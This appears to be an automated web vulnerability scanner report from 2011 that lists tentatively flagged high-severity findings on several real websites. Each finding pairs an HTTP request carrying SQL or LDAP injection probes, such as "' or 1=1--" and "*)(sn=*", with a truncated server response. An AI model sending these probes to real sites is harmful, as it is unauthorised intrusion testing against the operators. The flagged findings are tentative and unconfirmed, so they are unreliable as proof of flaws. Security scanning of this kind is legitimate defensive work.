language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
GET /cssjs'%20and%201%3d2--%20/countdownTimer.js?v Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:40 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cssjs/countdownTimer.js |
GET /cssjs/countdownTimer.js23080796'%20or%201%3d1-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:43 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
GET /cssjs/countdownTimer.js23080796'%20or%201%3d2-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:43 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /index.aspx |
GET /index.aspx'%20and%201%3d1--%20?template=ads.ascx&topic Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:28:03 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
GET /index.aspx'%20and%201%3d2--%20?template=ads.ascx&topic Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:28:04 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /uploaded-images/801818 |
GET /uploaded-images/80181898525213%20or%201%3d1-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:28:01 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
GET /uploaded-images/80181898525213%20or%201%3d2-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:28:01 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.networkad |
Path: | /managing/opt_out.asp |
GET /managing/opt_out.asp HTTP/1.1 Host: www.networkadvertising Proxy-Connection: keep-alive Referer: http://networkadvertising User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=1.1392774634 |
HTTP/1.1 200 OK Connection: close Date: Sat, 17 Sep 2011 16:43:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET cache-control: private pragma: no-cache cache-control: private pragma: no-cache Content-Type: text/html Expires: Fri, 16 Sep 2011 16:43:52 GMT Cache-control: no-cache <script> if(location.hostname != 'www.networkadvertising window.location="http:/ } </script> <script> //_______________________ ...[SNIP]... <img width='239' height='45' name='opt_1' src='http://optout.imiclk </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out ...[SNIP]... |
GET /managing/opt_out.asp HTTP/1.1 Host: www.networkadvertising Proxy-Connection: keep-alive Referer: http://networkadvertising User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=1.1392774634 |
HTTP/1.1 200 OK Connection: close Date: Sat, 17 Sep 2011 16:43:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET cache-control: private pragma: no-cache cache-control: private pragma: no-cache Content-Type: text/html Expires: Fri, 16 Sep 2011 16:43:54 GMT Cache-control: no-cache <script> if(location.hostname != 'www.networkadvertising window.location="http:/ } </script> <script> //_______________________ ...[SNIP]... <img width='239' height='45' name='opt_1' src='http://optout.imiclk </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.networkad |
Path: | /managing/opt_out.asp |
GET /managing/opt_out.asp?130670060'%20or%201%3d1-- Host: www.networkadvertising Proxy-Connection: keep-alive Referer: http://networkadvertising User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=1.1392774634 |
HTTP/1.1 200 OK Connection: close Date: Sat, 17 Sep 2011 16:44:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET cache-control: private pragma: no-cache cache-control: private pragma: no-cache Content-Type: text/html Expires: Fri, 16 Sep 2011 16:44:06 GMT Cache-control: no-cache <script> if(location.hostname != 'www.networkadvertising window.location="http:/ } </script> <script> //_______________________ ...[SNIP]... <img width='239' height='45' name='opt_1' src='http://optout.imiclk </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out ...[SNIP]... |
GET /managing/opt_out.asp?130670060'%20or%201%3d2-- Host: www.networkadvertising Proxy-Connection: keep-alive Referer: http://networkadvertising User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=1.1392774634 |
HTTP/1.1 200 OK Connection: close Date: Sat, 17 Sep 2011 16:44:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET cache-control: private pragma: no-cache cache-control: private pragma: no-cache Content-Type: text/html Expires: Fri, 16 Sep 2011 16:44:06 GMT Cache-control: no-cache <script> if(location.hostname != 'www.networkadvertising window.location="http:/ } </script> <script> //_______________________ ...[SNIP]... <img width='239' height='45' name='opt_1' src='http://optout.imiclk </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://y.timesunion.com |
Path: | /b/ss/hearstalbanytu/1/H |
GET /b%2527/ss/hearstalbanytu/1/H.21 Host: y.timesunion.com Proxy-Connection: keep-alive Referer: http://www.timesunion.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_pers=%20s_nr%3D131 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:36:58 GMT Server: Omniture DC/2.0.0 Content-Length: 439 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b%27/ss/hearstalbanytu/1 ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]... |
GET /b%2527%2527/ss/hearstalbanytu/1/H.21 Host: y.timesunion.com Proxy-Connection: keep-alive Referer: http://www.timesunion.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_pers=%20s_nr%3D131 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:36:58 GMT Server: Omniture DC/2.0.0 xserver: www498 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://ce.lijit.com |
Path: | /merge |
GET /*)(sn=*?pid=2&3pid=439524AE Host: ce.lijit.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.gather.com Cookie: ljtrtb=eJyrVjJUslKyN |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:09:13 GMT Server: PWS/ X-Px: ms h0-s1023.p10-sjc ( h0-s1004.p10-sjc), ms h0-s1004.p10-sjc ( origin>CONN) Cache-Control: max-age=30 Expires: Sat, 17 Sep 2011 17:09:43 GMT Age: 0 Content-Length: 284 Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Connection: keep-alive <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /*)(sn=* was not found on this server.</p> <hr> <address>Apache/2.2.14 (Ubuntu) Server at vap.lijit.com Port 80</address> </body></html> |
GET /*)!(sn=*?pid=2&3pid=439524AE Host: ce.lijit.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.gather.com Cookie: ljtrtb=eJyrVjJUslKyN |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:09:14 GMT Server: PWS/ X-Px: ms h0-s1023.p10-sjc ( h0-s1009.p10-sjc), ms h0-s1009.p10-sjc ( origin>CONN) Cache-Control: max-age=30 Expires: Sat, 17 Sep 2011 17:09:44 GMT Age: 0 Content-Length: 206 Content-Type: text/html; charset=iso-8859-1 Connection: keep-alive <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /*)!(sn=* was not found on this server.</p> </body></html> |
Severity: | High |
Confidence: | Tentative |
Host: | http://pixel.quantserve |
Path: | /optout_set |
GET /optout_set?s=nai&nocache Host: pixel.quantserve.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: mc=4e29da7c-0fd05-96398 |
HTTP/1.1 302 Found Connection: close Set-Cookie: qoo=OPT_OUT; expires=Tue, 14-Sep-2021 17:19:38 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV" Location: /optout_verify?s=nai Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 0 Date: Sat, 17 Sep 2011 17:19:38 GMT Server: QS |
GET /optout_set?s=nai&nocache Host: pixel.quantserve.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: mc=4e29da7c-0fd05-96398 |
HTTP/1.1 302 Found Connection: close Set-Cookie: qoo=OPT_OUT; expires=Tue, 14-Sep-2021 17:19:38 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV" Location: /optout_verify?s=nai Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 0 Date: Sat, 17 Sep 2011 17:19:38 GMT Server: QS |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.networkad |
Path: | /managing/optout_results |
POST /managing/optout_results Host: www.networkadvertising User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: __utma=1.519244467 Content-Type: application/x-www-form Content-Length: 873 optThis=1&optThis=2 ...[SNIP]... |
HTTP/1.1 200 OK Connection: close Date: Sat, 17 Sep 2011 17:18:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET cache-control: private pragma: no-cache Content-Type: text/html Expires: Fri, 16 Sep 2011 17:18:56 GMT Cache-control: no-cache <html> <head> <title> Welcome to Network Advertising Initiative </title> <link rel = stylesheet href = "../library/nai <script src="http://ww ...[SNIP]... <img src=http://optout.imiclk ...[SNIP]... |
POST /managing/optout_results Host: www.networkadvertising User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: __utma=1.519244467 Content-Type: application/x-www-form Content-Length: 873 optThis=1&optThis=2 ...[SNIP]... |
HTTP/1.1 200 OK Connection: close Date: Sat, 17 Sep 2011 17:18:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET cache-control: private pragma: no-cache Content-Type: text/html Expires: Fri, 16 Sep 2011 17:18:56 GMT Cache-control: no-cache <html> <head> <title> Welcome to Network Advertising Initiative </title> <link rel = stylesheet href = "../library/nai <script src="http://ww ...[SNIP]... <img src=http://optout.imiclk ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://amch.question |
Path: | /adsc/d927907/35/43624044 |
